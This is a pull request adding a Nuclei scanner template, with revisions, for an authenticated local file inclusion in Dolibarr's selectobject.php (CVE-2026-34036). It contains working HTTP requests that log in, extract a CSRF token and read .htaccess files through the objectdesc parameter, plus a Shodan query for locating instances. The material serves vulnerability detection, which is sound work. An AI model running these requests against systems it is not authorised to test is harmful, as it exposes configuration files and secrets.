### PR TITLE
Create CVE-2026-34036.yaml

### DIFF
--- a/http/cves/2026/CVE-2026-34036.yaml
+++ b/http/cves/2026/CVE-2026-34036.yaml
@@ -1,0 +1,76 @@
+id: CVE-2026-34036
+
+info:
+  name: Dolibarr <=22.0.4 - Authenticated Local File Inclusion (selectobject.php)
+  author: y0no
+  severity: medium
+  description: |
+    The core AJAX endpoint /core/ajax/selectobject.php includes a file derived
+    from the user-controlled `objectdesc` parameter via dol_include_once() before
+    any authorization check, and restrictedArea() fails open when the derived
+    feature is empty. An authenticated user with no specific privileges can read
+    the contents of arbitrary non-PHP files under the web root (e.g. conf/.htaccess,
+    .env, logs), disclosing sensitive data. PHP files fatal-error before their code
+    is shown, but text files are dumped into the response.
+  reference:
+    - https://github.com/Dolibarr/dolibarr/security/advisories/GHSA-2mfj-r695-5h9r
+    - https://github.com/Dolibarr/dolibarr/commit/743c22e57c0b2a017d6b92bec865d71ce6177a6a
+    - https://nvd.nist.gov/vuln/detail/CVE-2026-34036
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 6.5
+    cve-id: CVE-2026-34036
+    cwe-id: CWE-98
+  metadata:
+    verified: true
+    max-request: 3
+    vendor: dolibarr
+    product: dolibarr
+    shodan-query: http.title:"Dolibarr"
+  tags: cve,cve2026,dolibarr,lfi,auth,intrusive
+
+http:
+  - raw:
+      - |
+        GET / HTTP/1.1
+        Host: {{Hostname}}
+
+      - |
+        POST /index.php?mainmenu=home HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        token={{csrf}}&actionlogin=login&loginfunction=loginfunction&username={{username}}&password={{password}}
+
+      - |
+        GET /core/ajax/selectobject.php?outjson=0&htmlname=x&objectdesc=A:conf/.htaccess:0 HTTP/1.1
+        Host: {{Hostname}}
+
+    extractors:
+      - type: regex
+        name: csrf
+        internal: true
+        part: body
+        group: 1
+        regex:
+          - 'name="token" value="([a-f0-9]+)"'
+
+    matchers-condition: and
+    matchers:
+      # contents of the included conf/.htaccess file are reflected in the response
+      # (the file is flushed to the body before PHP fatals on the invalid class,
+      #  so the HTTP status varies by version/config and is intentionally not matched)
+      - type: word
+        part: body
+        words:
+          - "Order deny,allow"
+          - "Deny from all"
+        condition: and
+      # ensure this is the LFI output and not the login page (auth was required)
+      - type: word
+        part: body
+        words:
+          - "actionlogin"
+          - "Login @"
+        condition: or
+        negative: true

--- a/http/cves/2026/CVE-2026-34036.yaml
+++ b/http/cves/2026/CVE-2026-34036.yaml
@@ -1,17 +1,15 @@
 id: CVE-2026-34036
 
 info:
-  name: Dolibarr <=22.0.4 - Authenticated Local File Inclusion (selectobject.php)
+  name: Dolibarr <=22.0.4 - Local File Inclusion
   author: y0no
   severity: medium
   description: |
-    The core AJAX endpoint /core/ajax/selectobject.php includes a file derived
-    from the user-controlled `objectdesc` parameter via dol_include_once() before
-    any authorization check, and restrictedArea() fails open when the derived
-    feature is empty. An authenticated user with no specific privileges can read
-    the contents of arbitrary non-PHP files under the web root (e.g. conf/.htaccess,
-    .env, logs), disclosing sensitive data. PHP files fatal-error before their code
-    is shown, but text files are dumped into the response.
+    Dolibarr <= 22.0.4 contains a local file inclusion caused by manipulation of the objectdesc parameter and a fail-open logic flaw in restrictedArea() in /core/ajax/selectobject.php, letting authenticated users with no specific privileges read arbitrary non-PHP files.
+  impact: |
+    Authenticated users can read arbitrary non-PHP files, potentially exposing sensitive configuration and data files.
+  remediation: |
+    Update to the latest version once patches are available.
   reference:
     - https://github.com/Dolibarr/dolibarr/security/advisories/GHSA-2mfj-r695-5h9r
     - https://github.com/Dolibarr/dolibarr/commit/743c22e57c0b2a017d6b92bec865d71ce6177a6a
@@ -27,7 +25,9 @@ info:
     vendor: dolibarr
     product: dolibarr
     shodan-query: http.title:"Dolibarr"
-  tags: cve,cve2026,dolibarr,lfi,auth,intrusive
+  tags: cve,cve2026,dolibarr,lfi,auth,vuln
+
+flow: http(1) && http(2) && http(3)
 
 http:
   - raw:
@@ -35,6 +35,16 @@ http:
         GET / HTTP/1.1
         Host: {{Hostname}}
 
+    extractors:
+      - type: regex
+        name: csrf
+        part: body
+        group: 1
+        regex:
+          - 'name="token" value="([a-f0-9]+)"'
+        internal: true
+
+  - raw:
       - |
         POST /index.php?mainmenu=home HTTP/1.1
         Host: {{Hostname}}
@@ -42,31 +52,26 @@ http:
 
         token={{csrf}}&actionlogin=login&loginfunction=loginfunction&username={{username}}&password={{password}}
 
-      - |
-        GET /core/ajax/selectobject.php?outjson=0&htmlname=x&objectdesc=A:conf/.htaccess:0 HTTP/1.1
-        Host: {{Hostname}}
-
-    extractors:
-      - type: regex
-        name: csrf
+    matchers:
+      - type: dsl
+        dsl:
+          - 'status_code == 302'
         internal: true
-        part: body
-        group: 1
-        regex:
-          - 'name="token" value="([a-f0-9]+)"'
+
+  - raw:
+      - |
+        GET /core/ajax/selectobject.php?outjson=0&htmlname=x&objectdesc=A:includes/.htaccess:0 HTTP/1.1
+        Host: {{Hostname}}
 
     matchers-condition: and
     matchers:
-      # contents of the included conf/.htaccess file are reflected in the response
-      # (the file is flushed to the body before PHP fatals on the invalid class,
-      #  so the HTTP status varies by version/config and is intentionally not matched)
       - type: word
         part: body
         words:
-          - "Order deny,allow"
-          - "Deny from all"
+          - "FilesMatch"
+          - "SetHandler"
         condition: and
-      # ensure this is the LFI output and not the login page (auth was required)
+
       - type: word
         part: body
         words:

--- a/http/cves/2026/CVE-2026-34036.yaml
+++ b/http/cves/2026/CVE-2026-34036.yaml
@@ -25,7 +25,7 @@ info:
     vendor: dolibarr
     product: dolibarr
     shodan-query: http.title:"Dolibarr"
-  tags: cve,cve2026,dolibarr,lfi,auth,vuln
+  tags: cve,cve2026,dolibarr,lfi,auth,vuln,authenticated
 
 flow: http(1) && http(2) && http(3)
 


### PR DESCRIPTION
### PR Information

Dolibarr <=22.0.4 authenticated Local File Inclusion in core/ajax/selectobject.php. Verified against Dolibarr 20.0.4 with a live lab.

<!-- Explains the information and/or motivation for update or/ creating this templates -->
<!-- Please include any reference to your template if available -->

- Added CVE-2026-34036
- References: https://nvd.nist.gov/vuln/detail/cve-2026-34036

### Template validation

<!-- Clarifies if the valdation of the template was done on an actual system for which the template was developed -->
<!-- If this concerns a vulnerability check, please clarify if validation was done on a known vulnerable system and optionally on a known not vulnerable system to avoid false positives -->

- [x] Validated with a host running a vulnerable version and/or configuration (True Positive)
- [x] Validated with a host running a patched version and/or configuration (avoid False Positive)

#### Additional Details (leave it blank if not applicable)

<!-- Include `nuclei -debug` output along with Shodan / Fofa / Google Query / Docker or screenshots if available -->
<!-- Please do NOT include vulnerable host information in pull requests -->
<!-- None of the prerequisites are obligatory; they are merely intended to speed the review process. -->

### Additional References:

- [Nuclei Template Creation Guideline](https://docs.projectdiscovery.io/templates/introduction)
- [Nuclei Template Matcher Guideline](https://github.com/projectdiscovery/nuclei-templates/wiki/Unique-Template-Matchers)
- [Nuclei Template Contribution Guideline](https://github.com/projectdiscovery/nuclei-templates/blob/master/CONTRIBUTING.md)
- [PD-Community Discord server](https://discord.gg/projectdiscovery)
